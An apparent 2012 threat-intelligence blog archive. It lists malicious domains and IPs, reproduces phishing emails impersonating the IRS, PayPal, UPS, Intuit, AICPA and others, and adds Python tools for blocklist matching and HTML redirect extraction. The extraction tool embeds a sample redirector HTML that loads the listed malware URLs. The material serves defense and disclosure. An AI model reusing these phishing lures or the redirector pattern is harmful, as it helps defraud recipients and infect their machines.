The following domains appear to be part of an ongoing injection attack (currently using lasimp04risoned.rr.nu). They are hosted by the black-hat web host Specialist ISP in Transnistria. Blocking the IP range 194.28.112.0 - 194.28.115.255 (194.28.112.0/22) is a very good idea, as this is one of the worst netblocks I know of.
aelis30greek.rr.nu
aff29ili.rr.nu
aljo73hnsto.rr.nu
ambers00supplem.rr.nu
ano98the.rr.nu
appoin62tmentba.rr.nu
asciia28rmcover.rr.nu
ati92oni.rr.nu
ation82gamma.rr.nu
avia83resou.rr.nu
bear37sall.rr.nu
bitr07aryc.rr.nu
bles41steve.rr.nu
carrie01rskans.rr.nu
che59mica.rr.nu
chn34olo.rr.nu
comme17rcial.rr.nu
cons63isten.rr.nu
cos69tbu.rr.nu
cov59erm.rr.nu
cthu85srisc.rr.nu
ctsc60anli.rr.nu
eates01publi.rr.nu
ection18depres.rr.nu
elew72isst.rr.nu
enedm79ultina.rr.nu
enegat43ivecon.rr.nu
engag75edfol.rr.nu
enge75sfra.rr.nu
enormousw1illa.com
ens122zzzddazz.com
entio21nsamba.rr.nu
esgen48erally.rr.nu
eside00ntwin.rr.nu
fee89edi.rr.nu
gra98desi.rr.nu
hitam41ultime.rr.nu
hoperjoper.ru
iab35ilit.rr.nu
ialac93idcod.rr.nu
icans11deskto.rr.nu
ident08winner.rr.nu
impo82rtse.rr.nu
int99onin.rr.nu
ion68you.rr.nu
ited51pala.rr.nu
ive23lit.rr.nu
kpo82stp.rr.nu
lasimp04risoned.rr.nu
lighte93dnickel.rr.nu
limina94tedefi.rr.nu
mainglobilisi.com
mals30ynta.rr.nu
mpa89qaut.rr.nu
mtube-ssl.com
ncomp97aredli.rr.nu
neou44slypa.rr.nu
ngsin45dividu.rr.nu
nstitu42tional.rr.nu
nting91uncle.rr.nu
nusi60ngmus.rr.nu
ocat47edha.rr.nu
ocum04entat.rr.nu
oneflo30orcall.rr.nu
onsco10mdexpo.rr.nu
ort26ibm.rr.nu
ort53hori.rr.nu
ovie26tther.rr.nu
pxm-tube.com
qtr49exis.rr.nu
raff60icke.rr.nu
rlyspa21rcleona.rr.nu
rsm95ario.rr.nu
scue08doral.rr.nu
selle33rsjunk.rr.nu
sicb79enef.rr.nu
sor52tium.rr.nu
ssic2061thligh.rr.nu
ssmo24king.rr.nu
sweepstakesandcontestsdo.com
sweepstakesandcontestsinfo.com
syno98nepet.rr.nu
takeo46versav.rr.nu
tanswe24ringni.rr.nu
tarts63exten.rr.nu
timel08arges.rr.nu
tiona82lclos.rr.nu
tormco48nstitu.rr.nu
tssign51stechno.rr.nu
vada86subje.rr.nu
velit30eratu.rr.nu
viv17eddr.rr.nu
whyi70splay.rr.nu
yint60eres.rr.nu
ysoci94alspec.rr.nu
zbol42lahg.rr.nu
Tuesday, 31 July 2012
Something evil on 194.28.115.150 and lasimp04risoned.rr.nu
Labels:
Evil Network,
Malware,
Moldova,
Specialist ISP,
Transnistria,
Viruses
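As an added example (not part of the original post): a small offline Python checker that turns the indicators on this page into something that can be run against logs. It holds the 194.28.112.0/22 netblock, a handful of the hosting IPs and domains quoted on this page, and the two URL shapes every payload link on this page follows (main.php?page=<16 hex> and :8080/forum/showthread.php?page=<16 hex>). Domain matching is label-aligned, so a listed domain also catches its subdomains but the parent rr.nu zone is not blocked as a whole. The proxy-log line format and the sample log lines are constructed for the demonstration.

```python
"""Offline blocklist checker built from the indicators on this page.

Added example, not part of the original post. The indicator values are
copied from the page (a representative subset); the proxy-log format and
the sample lines are constructed for the demonstration.
"""
import ipaddress
import re
from urllib.parse import urlsplit

# Netblock the post recommends blocking outright.
BLOCK_NETS = [ipaddress.ip_network("194.28.112.0/22")]

# Individual hosting IPs quoted on this page.
BLOCK_IPS = {ipaddress.ip_address(a) for a in (
    "194.28.115.150", "89.111.177.151", "203.80.16.81", "78.83.233.242",
    "213.17.171.186", "221.131.129.200", "89.253.231.202")}

# Payload and injection domains quoted on this page (subset).
BLOCK_DOMAINS = {
    "lasimp04risoned.rr.nu", "hoperjoper.ru", "mtube-ssl.com",
    "online-gaminatore.ru", "furnitura-forums.ru", "porschedesignrussia.ru",
    "retweetadministrator.org", "teloexpressions.org", "jeffknitwear.org"}

# Every payload URL quoted on the page has one of two shapes:
#   /main.php?page=<16 hex digits>
#   :8080/forum/showthread.php?page=<16 hex digits>
PAYLOAD_URL = re.compile(
    r"(?:/main\.php|:8080/forum/showthread\.php)\?page=[0-9a-f]{16}(?![0-9a-f])")


def domain_hit(host):
    """Return the blocked domain that `host` equals or sits under, else None.

    Matching is label-aligned: 'www.hoperjoper.ru' hits 'hoperjoper.ru',
    but 'xhoperjoper.ru' does not, and rr.nu as a whole is never blocked.
    """
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in BLOCK_DOMAINS:
            return candidate
    return None


def ip_hit(addr):
    """Return the blocked address or netblock containing `addr`, else None."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:          # not an IP literal (e.g. a hostname)
        return None
    if ip in BLOCK_IPS:
        return str(ip)
    for net in BLOCK_NETS:
        if ip in net:
            return str(net)
    return None


def check_request(dst_ip, url):
    """Classify one outbound request; returns the list of reasons it matched
    (an empty list means nothing on the blocklist was touched)."""
    reasons = []
    host = urlsplit(url).hostname or ""
    d = domain_hit(host)
    if d:
        reasons.append("domain:" + d)
    for addr in (dst_ip, host):     # the URL host may itself be an IP literal
        h = ip_hit(addr)
        if h:
            reasons.append("ip:" + h)
            break
    if PAYLOAD_URL.search(url):
        reasons.append("url-pattern")
    return reasons


# Constructed proxy-log lines: "<time> <client> <destination-ip> <url>".
SAMPLE_LOG = """\
2012-07-31T10:00:01Z 10.1.1.5 194.28.115.150 http://lasimp04risoned.rr.nu/in.php
2012-07-26T15:30:44Z 10.1.1.7 89.253.231.202 http://retweetadministrator.org/main.php?page=8b45f871830c6e5a
2012-07-25T14:12:09Z 10.1.1.9 78.83.233.242 http://furnitura-forums.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c
2012-07-25T14:13:00Z 10.1.1.9 198.51.100.7 http://www.example.com/main.php?page=about
2012-07-31T10:05:00Z 10.1.1.5 194.28.113.7 http://194.28.113.7/x.php
"""


def scan_log(text):
    """Return (line number, url, reasons) for every line that matched."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if len(fields) != 4:
            continue
        reasons = check_request(fields[2], fields[3])
        if reasons:
            hits.append((n, fields[3], reasons))
    return hits


if __name__ == "__main__":
    for n, url, reasons in scan_log(SAMPLE_LOG):
        print("line %d %s -> %s" % (n, url, ", ".join(reasons)))
```

Checking the destination IP separately from the hostname matters here: the /22 catches 194.28.113.7 in the last sample line even though neither that address nor any domain pointing at it is in the list, which is the whole point of blocking the netblock rather than the individual hosts.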
Friday, 27 July 2012
Malware on online-gaminatore.ru
89.111.177.151
203.80.16.81
78.83.233.242
These IPs have been used several times recently and should be blocked.
Thursday, 26 July 2012
"Federal Tax transfer" spam / retweetadministrator.org
Date: Thu, 26 Jul 2012 20:56:10 +0530
From: "Internal Revenue Service" [alerts@irs.gov]
Subject: Federal Tax transfer returned
Your federal Tax payment (ID: 632004160993), recently from your checking account was rejected by the your financial institution.
Canceled Tax transfer
Tax Transaction ID: 632004160993
Rejection Reason See details in the report below
Tax Transaction Report tax_report_632004160993.doc (Microsoft Word Document)
Internal Revenue Service, Metro Plex 1, 8401 Corporate Drive, Suite 300, Landover, MD 20785
==========
Date: Thu, 26 Jul 2012 20:55:41 +0530
From: "Internal Revenue Service" [support@irs.gov]
Subject: Rejected Federal Tax transaction
Your Tax payment (ID: 766644379032), recently initiated from your checking account was rejected by the your financial institution.
Rejected Tax transfer
Tax Transaction ID: 766644379032
Reason of rejection See details in the report below
FederalTax Transaction Report tax_report_766644379032.doc (Microsoft Word Document)
Internal Revenue Service, Metro Plex 1, 8401 Corporate Drive, Suite 300, Landover, MD 20785
==========
Date: Thu, 26 Jul 2012 12:00:54 -0300
From: "Internal Revenue Service" [support@irs.gov]
Subject: Rejected Federal Tax transfer
Your federal Tax payment (ID: 776394251906), recently from your checking account was returned by the your financial institution.
Canceled Tax transfer
Tax Transaction ID: 776394251906
Reason of rejection See details in the report below
FederalTax Transaction Report tax_report_776394251906.doc (Microsoft Word Document)
Internal Revenue Service, Metro Plex 1, 8401 Corporate Drive, Suite 300, Landover, MD 20785
The malicious payload is on [donotclick]retweetadministrator.org/main.php?page=8b45f871830c6e5a (report here) hosted on 89.253.231.202 (Rusonyx Ltd, Moscow).
"Adobe CS4 License" spam / online-gaminatore.ru
Date: Thu, 26 Jul 2012 09:24:01 +0900
From: FentonpJsGh9LIsiah@aol.com
Subject: Order N81149
Dear Sirs,
You can download your Adobe CS4 License here -
We encourage you to explore its new and enhanced capabilities with these helpful tips, tutorials, and eSeminars.
Thank you for buying Adobe InDesign CS4 software.
Adobe Systems Incorporated
The malicious payload is at [donotclick]online-gaminatore.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c (report here) hosted on the following IPs:
89.111.177.151 (Garant-Park-Telecom, Russia)
78.83.233.242 (Spectrum Net JSC, Bulgaria)
These IPs should be blocked if you can.
Wednesday, 25 July 2012
"Wire Transfer" spam / furnitura-forums.ru
This fake "Wire Transfer" spam (or is it UPS?) leads to malware on furnitura-forums.ru:
The attachment Wire_ID88283.htm attempts to load malware from [donotclick]furnitura-forums.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c (report here) hosted on the following IPs:
78.83.233.242 (Spectrum Net JSC, Bulgaria)
203.80.16.81 (Myren, Malaysia)
These two IP addresses also host some other malware sites and are worth blocking:
porschedesignrussia.ru
bmwforummsk.ru
phpforkiddies.ru
forumanarhist.ru
Date: Wed, 25 Jul 2012 09:12:43 -0500
From: "Express MyUps" [upsservices@ups.com]
Subject: Fwd: Re: Wire Transfer
Attachments: Wire_ID88283.htm
Dear Operator,
WIRE FID: NO-004394626739460
STATUS: CANCELLED
You can find details in the attached file.
US Airways spam / reformattedfilmmaker.org and algebrayep.org
This fake US Airways spam leads to malware on reformattedfilmmaker.org:
The malicious payload is at [donotclick]reformattedfilmmaker.org/main.php?page=70ec803a01c84ddc (report here) hosted on the same Chinese IP address of 221.131.129.200 that was used in a similar spam run yesterday.
UPDATE: a similar US Airways spam run is also underway with a malicious payload on algebrayep.org on the same IP address.
Date: Wed, 25 Jul 2012 09:46:57 -0500
From: "US Airways - Reservations" [support@myusairways.com]
Subject: Confirm your US airways online reservation.
You should check in from 24 hours and up to 60 minutes before your flight (2 hours if you're flying abroad). After that, all you have to do is print your boarding pass and go to the gate.
Confirmation code: 210916
Check-in online: Online reservation details
Flight
4817
Departure city and time
Washington, DC (DCA) 10:00PM
Depart date: 7/26/2012
We are committed to protecting your privacy. Your information is kept private and confidential. For information about our privacy policy visit usairways.com.
US Airways, 111 W. Rio Salado Pkwy, Tempe, AZ 85281 , Copyright US Airways , All rights reserved.
Labels:
Amerika,
Malware,
Spam,
US Airways,
Viruses
Tuesday, 24 July 2012
PayPal Spam / teloexpressions.org
Date: Tue, 24 Jul 2012 18:06:49 +0330
From: "Allan Marquez" <notify@paypal.com>
Subject: Paypal has sent you a bank transfer.
We are moving funds from Your Paypal account to your bank account.
Total amount transferred $ 131.54
Bank account BANK OF AMERICA
Transaction ID 59566237893344612
Help Center Resolution Center Security Center
Please don't reply to this email. It'll just confuse the computer that sent it and you won't get a response.
Copyright 2012 PayPal, Inc. All rights reserved. PayPal is located at 2211 N. First St., San Jose, CA 95131.
==========
Date: Tue, 24 Jul 2012 11:33:00 -0300
From: "Jody Wade" <notify@paypal.com>
Subject: Paypal transfer to your bank account initiated.
We are transferring funds from Your Paypal account to your bank account.
Total amount transferred $ 944.68
Bank account BANK OF NORTH CAROLINA
Transaction ID 67081555155766933
Help Center Resolution Center Security Center
Please don't reply to this email. It'll just confuse the computer that sent it and you won't get a response.
Copyright 2012 PayPal, Inc. All rights reserved. PayPal is located at 2211 N. First St., San Jose, CA 95131.
==========
Date: Tue, 24 Jul 2012 11:10:58 -0300
From: "Evan Battle" <notify@paypal.com>
Subject: We have sent you a bank transfer.
We are sending funds from Paypal to your bank account.
Total amount transferred $ 123.59
Bank account CITYBANK
Transaction ID 55273357044211327
Help Center Resolution Center Security Center
Please don't reply to this email. It'll just confuse the computer that sent it and you won't get a response.
Copyright 2012 PayPal, Inc. All rights reserved. PayPal is located at 2211 N. First St., San Jose, CA 95131.
==========
Date: Tue, 24 Jul 2012 19:15:46 +0530
From: "service@paypal.com" <service@paypal.com>
Subject: Paypal transfer to your bank account initiated.
We are moving funds from Paypal to your bank account.
Total amount transferred $ 425.21
Bank account BANK OF NORTH CAROLINA
Transaction ID 17744199446279262
Help Center Resolution Center Security Center
Please don't reply to this email. It'll just confuse the computer that sent it and you won't get a response.
Copyright 2012 PayPal, Inc. All rights reserved. PayPal is located at 2211 N. First St., San Jose, CA 95131.
==========
Date: Tue, 24 Jul 2012 09:45:45 -0400
From: "service@paypal.com" <service@paypal.com>
Subject: Paypal has sent you a bank transfer.
We are moving funds from Your Paypal account to your bank account.
Total amount transferred $ 191.22
Bank account CITYBANK
Transaction ID 64722827521858421
Help Center Resolution Center Security Center
Please don't reply to this email. It'll just confuse the computer that sent it and you won't get a response.
Copyright 2012 PayPal, Inc. All rights reserved. PayPal is located at 2211 N. First St., San Jose, CA 95131.
The malicious payload is at [donotclick]teloexpressions.org/main.php?page=9aca5bbc34d3ebd6 (report here) hosted on 221.131.129.200 which we have seen before and is definitely worth blocking.
Monday, 23 July 2012
"Hi, we think you may be entitled to compensation.." SMS spam
The PPI claim spammers are back again, this time using the throwaway number of +447969662555
Hi, we think you may be entitled to compensation of up to £3500 from missold PPI on a credit card or loan.
Reply PPI for more info
Reply STOP to opt out
Obviously they think nothing of the sort and are just randomly spamming, even to mobile phone numbers registered with the TPS. Given that their pitch is based on a lie, it's likely that the whole outfit is some sort of scam in any case.
If you get one of these, you should forward the spam and the sender's number to your carrier. In the case of T-Mobile, O2 and Orange the number to report to is 7726 ("SPAM"). Vodafone customers should use 87726 ("VSPAM") and Three customers should use 37726 ("3SPAM"). Hopefully the carriers will act if there are enough complaints.
Friday, 20 July 2012
Wire Transfer spam / porschedesignrussia.ru
Date: Fri, 20 Jul 2012 04:10:52 +0100
Subject: RE: Your Wire Transfer N02526593
Good morning,
Wire debit transfer was canceled by the other financial institution.
Canceled transfer:
FED REFERENCE NUMBER: ISL9653367088ODP06829K
Transfer Report: View
Federal Reserve Wire Network
The malicious payload is at [donotclick]porschedesignrussia.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c (report here) hosted on the following IPs:
78.83.233.242
203.80.16.81
213.17.171.186
These are the same IP addresses as used in this attack from yesterday. Blocking them would probably be prudent.
Labels:
Malvertising,
RU:8080,
Spam,
Viruses
Thursday, 19 July 2012
AICPA spam / jeffknitwear.org
I haven't seen this fake AICPA spam for a while, but here it is, this time leading to a malicious payload on the domain jeffknitwear.org:
The malicious payload is at [donotclick]jeffknitwear.org/main.php?page=8614d3f3a69b5162 (report here) hosted on 221.131.129.200 (China Mobile, China). The following domains are on the same server and you should either block the IP or these domains too:
checkingservices.net
historyalmostany.org
jeffknitwear.org
lefttorightproductservice.org
toeplunge.org
yourfirstwall.com
visorwordprocessor.org
Date: Thu, 19 Jul 2012 17:03:06 +0300
From: "Lakisha Rush" [support@aicpa.org]
Subject: Termination of your accountant license.
You're receiving this notification as a Certified Public Accountant and a member of AICPA.
Having trouble reading this email? View it in your browser.
Cancellation of Accountant status due to income tax fraud allegations
Dear AICPA member,
We have received a complaint about your possible participation in income tax refund fraudulent activity for one of your clients. According to AICPA Bylaw Paragraph 730 your Certified Public Accountant license can be withdrawn in case of the fact of filing of a misguided or fraudulent tax return for your client or employer.
Please be informed of the complaint below and respond to it within 7 days. The failure to respond within this term will result in cancellation of your CPA license.
Complaint.pdf
The American Institute of Certified Public Accountants.
Email: service@aicpa.org
Tel. 888.777.7077
Fax. 800.362.5066
==========
Date: Thu, 19 Jul 2012 14:02:48 +0000
From: "Jonathan Gallagher" [support@aicpa.org]
Subject: Fraudulent tax return assistance accusations.
You're receiving this email as a Certified Public Accountant and a member of AICPA.
Having trouble reading this email? View it in your browser.
Cancellation of Accountant status due to income tax fraud allegations
Dear accountant officer,
We have been notified of your possible involvement in tax return fraudulent activity for one of your employees. According to AICPA Bylaw Paragraph 730 your Certified Public Accountant license can be cancelled in case of the occurrence of presenting of a misguided or fraudulent income tax return on the member's or a client's behalf.
Please familiarize yourself with the notification below and respond to it within 14 days. The failure to provide the clarifications within this time-frame will result in termination of your Accountant status.
Complaint.pdf
The American Institute of Certified Public Accountants.
Email: service@aicpa.org
Tel. 888.777.7077
Fax. 800.362.5066
"Fwd: Wire Transfer (9579GQ518) " spam / forumanarhist.ru
Date: Thu, 19 Jul 2012 02:56:36 -0400
From: CABALLEROFANNYcRU@aol.com
Subject: Fwd: Wire Transfer (9579GQ518)
Attachments: Wire_AMBA01-Rejected.htm
Dear Operator,
WIRE N: FD-1059598546520289
STATUS: REJECTED
You can find details in the attached file.
The malicious attachment is named Wire_AMBA01-Rejected.htm and contains a redirector to [donotclick]forumanarhist.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c (report here)
That site is multihomed at the following IPs:
78.83.233.242
203.80.16.81
213.17.171.186
There are some additional IPs and domains that can be found in this post that should also be blocked.
"Wire Transfer" spam / phpforkiddies.ru
Date: Wed, 18 Jul 2012 01:23:20 +0300
From: "EUNA Wood" [AdamWnukowski@himsa.com.mx]
Subject: Fwd: Wire Transfer (75073UQ608)
Attachments: Wire_NFED_Rejected.htm
Dear Operator,
WIRE N: FED-9058663000926019
STATUS: REJECTED
You can find details in the attached file.
The attachment in this case is called Wire_NFED_Rejected.htm and contains a script that attempts to load malware from [donotclick]phpforkiddies.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c (report here), which is multihomed. The following IPs and domains are connected and should be blocked:
41.66.137.155
50.57.43.49
62.76.186.75
62.76.188.120
62.213.64.161
78.83.233.242
85.143.166.243
87.120.41.155
89.111.177.151
173.203.96.79
184.106.189.124
193.109.144.51
203.80.16.81
203.172.140.202
213.17.171.186
bmwforummsk.ru
forumenginesspb.ru
hamlovladivostok.ru
mazdaontours.ru
phpforkiddies.ru
porscheforumspb.ru
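The three "Wire Transfer" posts above (furnitura-forums.ru, forumanarhist.ru and phpforkiddies.ru) all describe a .htm attachment whose only job is to send the browser to a :8080/forum/showthread.php URL. As an added example, not code from the original posts, here is a static extractor that pulls such targets out of an HTML attachment without rendering it. The attachment below is constructed to illustrate the usual ways a redirector is written (meta refresh, hidden iframe, remote script, and a location assignment built from concatenated string literals); it is not a copy of Wire_ID88283.htm, Wire_AMBA01-Rejected.htm or Wire_NFED_Rejected.htm, and the loader.js path under 203.80.16.81 is made up for the sample.

```python
"""Static extraction of redirect targets from an .htm mail attachment.

Added example, not code from the original posts. The sample attachment is
constructed to resemble the redirectors the posts describe; it is not a copy
of any real attachment, and the script path under 203.80.16.81 is made up.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# A JS string literal (no escape handling; see the note after the block).
STR = r'''(?:"[^"\\]*"|'[^'\\]*')'''
LITERAL = re.compile(STR)
# location = "..." / location.href = "..." / location.replace("...") /
# location.assign("..."), where the argument may be several literals joined by +.
JS_LOCATION = re.compile(
    r"location(?:\.href)?\s*(?:=|\.replace\(|\.assign\()\s*("
    + STR + r"(?:\s*\+\s*" + STR + r")*)")
META_URL = re.compile(r"""url\s*=\s*['"]?([^'"\s]+)""", re.I)


class RedirectExtractor(HTMLParser):
    """Collects (mechanism, url) pairs for everything that would pull the
    browser somewhere else: meta refresh, iframes, remote scripts, form
    actions and inline location assignments."""

    def __init__(self):
        super().__init__()
        self.targets = []
        self._in_script = False
        self._script = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe" and a.get("src"):
            self.targets.append(("iframe", a["src"]))
        elif tag == "script":
            self._in_script = True
            if a.get("src"):
                self.targets.append(("script-src", a["src"]))
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = META_URL.search(a.get("content") or "")
            if m:
                self.targets.append(("meta-refresh", m.group(1)))
        elif tag == "form" and a.get("action"):
            self.targets.append(("form-action", a["action"]))

    def handle_data(self, data):
        # HTMLParser hands <script> bodies over as raw data; buffer them.
        if self._in_script:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            js, self._script = "".join(self._script), []
            for m in JS_LOCATION.finditer(js):
                parts = LITERAL.findall(m.group(1))
                self.targets.append(("js-location", "".join(p[1:-1] for p in parts)))


def extract_targets(html):
    """Return [(mechanism, url), ...] in document order."""
    p = RedirectExtractor()
    p.feed(html)
    p.close()
    return p.targets


def external_hosts(html):
    """Distinct host[:port] values the attachment would contact, in order found."""
    seen = []
    for _, url in extract_targets(html):
        u = urlsplit(url)
        if u.scheme in ("http", "https") and u.hostname:
            hp = u.hostname + (":%d" % u.port if u.port else "")
            if hp not in seen:
                seen.append(hp)
    return seen


# Constructed sample attachment (not a real one).
SAMPLE_HTM = """<html><head>
<meta http-equiv="refresh" content="5; url=http://furnitura-forums.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c">
<script src="http://203.80.16.81/loader.js"></script>
</head><body>
<h1>Please wait, your wire report is loading...</h1>
<iframe src="http://phpforkiddies.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c" width="1" height="1"></iframe>
<script>
window.location.href = "http://" + "porschedesignrussia.ru:8080" + "/forum/showthread.php?page=5fa58bce769e5c2c";
</script>
</body></html>"""


if __name__ == "__main__":
    for mech, url in extract_targets(SAMPLE_HTM):
        print("%-13s %s" % (mech, url))
    print("hosts:", external_hosts(SAMPLE_HTM))
```

Run it on a quarantined attachment with extract_targets(open(path, encoding="utf-8", errors="replace").read()); any absolute http(s) target, and especially one on a non-standard port such as :8080, is what to block and then search for in proxy logs. Heavier obfuscation (escaped strings, eval chains, targets assembled at runtime) will defeat a regex like this, so treat a script block with no recoverable target as a reason to look closer, not as clean.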
Tuesday, 17 July 2012
Fake Craigslist emails / visorwordprocessor.org
These fake Craigslist emails lead to malware on visorwordprocessor.org:
The malicious payload is at [donotclick]visorwordprocessor.org/main.php?page=ed0a25d616022c57 (report here) hosted on 91.227.18.26 (Eximus LLC, Russia). The nameservers are at good-autosport.com which links this attack in with this one earlier today.
Date: Tue, 17 Jul 2012 09:01:11 -0500
From: "craigslist - automated message, do not reply" [robot@craigslist.org]
Subject: Your Craiglist.org posting URL.
Posting ID # 27643127:
"Double Stainless Steel Sink" (household items - by owner)
Should now be accessible at the following URL:
http://craigslist.org/hsh/262383.html
Index pages and search results are updated every 15 minutes.
To edit or delete, please log in to your member area.
If you are having trouble finding your posting in the listings:
http://www.craigslist.org/about/help/how_to_fi= nd_your_post_in_the_listings
For other questions or help:
http://w= ww.craigslist.org/about/help/
Safety tips and avoiding scams:
http://= www.craigslist.org/about/safety
http://www.craigslist.o= rg/about/scams
Thanks for using craigslist!
==========
Date: Tue, 17 Jul 2012 06:00:52 -0800
From: "craigslist - automated message, do not reply" [robot@craigslist.org]
Subject: Your Craiglist posting is successful.
Posting ID # 14717917:
"Turbo 400 Tranny" (household items - by owner)
Should now be accessible at the following URL:
http://craigslist.org/hsh/888725.html
New postings are updated every 15 minutes.
To edit or delete, please log in to your member area.
If you are having trouble finding your item in the listings:
http://www.craigslist.org/about/help/how_to_fi= nd_your_post_in_the_listings
For other questions or help:
http://w= ww.craigslist.org/about/help/
Safety tips and avoiding scams:
http://= www.craigslist.org/about/safety
http://www.craigslist.o= rg/about/scams
Thanks for using craigslist!
==========
Date: Tue, 17 Jul 2012 15:13:26 +0200
From: "craigslist - automated message, do not reply" [robot@craigslist.org]
Subject: Your Craiglist posting is successful.
Posting ID # 49685217:
"Generator" (household items - by owner)
Should now be viewable at the following URL:
http://craigslist.org/hsh/887563.html
New postings are updated every 15 minutes.
To edit or delete, please log in to your account.
If you are experiencing problems finding your posting in the listings:
http://www.craigslist.org/about/help/how_to_fi= nd_your_post_in_the_listings
For other questions or help:
http://w= ww.craigslist.org/about/help/
Safety tips and avoiding scams:
http://= www.craigslist.org/about/safety
http://www.craigslist.o= rg/about/scams
Thanks for using craigslist!
==========
Date: Tue, 17 Jul 2012 10:09:15 -0300
From: "craigslist - automated message, do not reply" [robot@craigslist.org]
Subject: You can access your Craiglist listing by the new location.
Posting ID # 35649793:
"Screwdrivers kit" (household items - by owner)
Can now be viewable at the following location:
http://craigslist.org/hsh/284761.html
Index pages and search results are updated every 15 minutes.
To edit or delete, please log in to your account.
If you are having trouble finding your item in the listings:
http://www.craigslist.org/about/help/how_to_fi= nd_your_post_in_the_listings
For other questions or help:
http://w= ww.craigslist.org/about/help/
Safety tips and avoiding scams:
http://= www.craigslist.org/about/safety
http://www.craigslist.o= rg/about/scams
Thanks for using craigslist!
Intuit "Henderson LLC" payment spam / mailmergesfinger.org
This fake Intuit spam leads to malware on mailmergesfinger.org:
The malicious payload is at [donotclick]mailmergesfinger.org/main.php?page=bfc8be54a0120bca (report here) hosted on 94.249.172.71 (GHOSTnet, Germany).
The following IPs and domains are connected and should be avoided or blocked:
13.65.99.23
46.20.33.131
62.109.26.35
78.129.132.14
80.77.87.185
94.249.172.71
108.76.72.229
109.164.221.176
164.15.250.148
195.54.32.91
198.144.189.51
200.184.213.131
211.157.105.160
afriget.net
cms-wideopendns.com
fonografs.net
good-autosport.com
mailmergesfinger.org
peace-computer.com
proamd-inc.com
thaidescribed.com
Date: Mon, 16 Jul 2012 18:10:26 +0000
From: "Intuit PaymentNetwork" [support@intuit.com]
Subject: You have received a new payment through the Intuit network.
Payment received: You received $280.00 from Henderson LLC for invoice 91816
You can access the payment details here.
Funds will be deposited in your bank account.
You now have the possibility to get paid by Credit Card on your invoices. To find put more please sign in to your IPN account and click on the 'Profile' tab on the left.
Monday, 16 July 2012
"Intuit Payroll Services" spam / cms-wideopendns.com
These (rather confused) spam emails lead to malware on cms-wideopendns.com:
LinkedIn? Intuit? The bad guys are confused, but these are dangerous emails nonetheless. The malicious payload is at [donotclick]cms-wideopendns.com/main.php?page=bfc8be54a0120bca (report here) hosted on the following IPs:
211.157.105.160 (Chinacomm, China)
109.164.221.176 (Swisscom, Switzerland)
The following IPs and domains are all connected and should be blocked:
46.20.33.131
62.109.26.35
80.77.87.185
108.76.72.229
109.164.221.176
164.15.250.148
195.54.32.91
198.144.189.51
211.157.105.160
afriget.net
cms-wideopendns.com
fonografs.net
peace-computer.com
proamd-inc.com
thaidescribed.com
From: LinkedIn Communication [mailto:support@intuit.com]
Sent: 16 July 2012 15:12
Subject: We have received your payroll processing request.
Direct Deposit Service Communication
Status update
Dear victim
We received your payroll on July 16, 2012 at 1:16 AM Pacific Time.
• Funds will be withdrawn from the bank account number ending in: XXXX on July 17, 2012.
• Amount to be withdrawn: $2,476.11
• Paychecks will be deposited to your employees' accounts on: July 17, 2012
• Please download your payroll here.
Funds are as a rule processed before normal banking hours so please make sure you have sufficient funds available by 12 a.m. on the date funds are to be withdrawn.
Intuit must receive your payroll by 5 p.m. Pacific time, two banking days before your payment date or your employees will fail to be paid on time. QuickBooks does not process payrolls on weekends or federal banking holidays. A list of federal banking holidays can be downloaded at the Federal Reserve website.
Thank you for your business.
Sincerely,
Intuit Payroll Services
IMPORTANT NOTICE: This notification is being sent to inform you of a critical matter concerning your current service or software. Please note that if you previously opted out of receiving marketing materials from Intuit, you may continue to receive notifications similar to this communication that affect your service or software.
If you have any questions or comments about this email, please DO NOT REPLY to this email. If you need additional information please contact us.
If you receive an email message that appears to come from Intuit but that you suspect is a phishing email, please forward it to immediately to spoof@intuit.com.
Copyright 2008 Intuit Inc. QuickBooks and Intuit are registered trademarks of and/or registered service marks of Intuit Inc. in the United States and other countries. This notification is not intended to supplement, modify, or extend the Intuit software license agreement between you and Intuit for any Intuit product or service.
Intuit Inc. Customer Communications
2800 E. Commerce Center Place, Tucson, AZ 85706
====================
From: LinkedIn Communication [support@intuit.com]
Sent: Mon 16/07/2012 15:12
Subject: Your payroll processing is initiated by Intuit.
Direct Deposit Service Communication
Status update
Dear victim
We obtained your payroll on July 16, 2012 at 7:36 AM Pacific Time.
• Funds will be withdrawn from the bank account number ending in: XXXX on July 17, 2012.
• Amount to be withdrawn: $5,582.11
• Paychecks will be deposited to your employees' accounts on: July 17, 2012
• Please download your payroll here.
Funds are typically withdrawn before normal banking hours so please make sure you have sufficient funds available by 12 a.m. on the date funds are to be withdrawn.
Intuit must receive your payroll by 5 p.m. Pacific time, two banking days before your payment date or your employees will fail to be paid on time. QuickBooks does not process payrolls on weekends or federal banking holidays. A list of federal banking holidays can be downloaded at the Federal Reserve website.
Thank you for your business.
Sincerely,
Intuit Payroll Services
IMPORTANT NOTICE: This notification is being sent to inform you of a critical matter concerning your current service or software. Please note that if you previously opted out of receiving marketing materials from Intuit, you may continue to receive notifications similar to this communication that affect your service or software.
If you have any questions or comments about this email, please DO NOT REPLY to this email. If you need additional information please contact us.
If you receive an email message that appears to come from Intuit but that you suspect is a phishing email, please forward it to immediately to spoof@intuit.com.
Copyright 2008 Intuit Inc. QuickBooks and Intuit are registered trademarks of and/or registered service marks of Intuit Inc. in the United States and other countries. This notification is not intended to supplement, modify, or extend the Intuit software license agreement between you and Intuit for any Intuit product or service.
Intuit Inc. Customer Communications
2800 E. Commerce Center Place, Tucson, AZ 85706
Sunday, 15 July 2012
Facebook "Error message [404] 404 Not Found" email messages
This one has me scratching my head: a series of emails this morning with subjects similar to the following:
Error message [404] 404 Not Found for m.facebook.com/media/set/?set=a.[redacted].8100.100000762125833
Error message [404] 404 Not Found for m.facebook.com/pokes/?refid=7
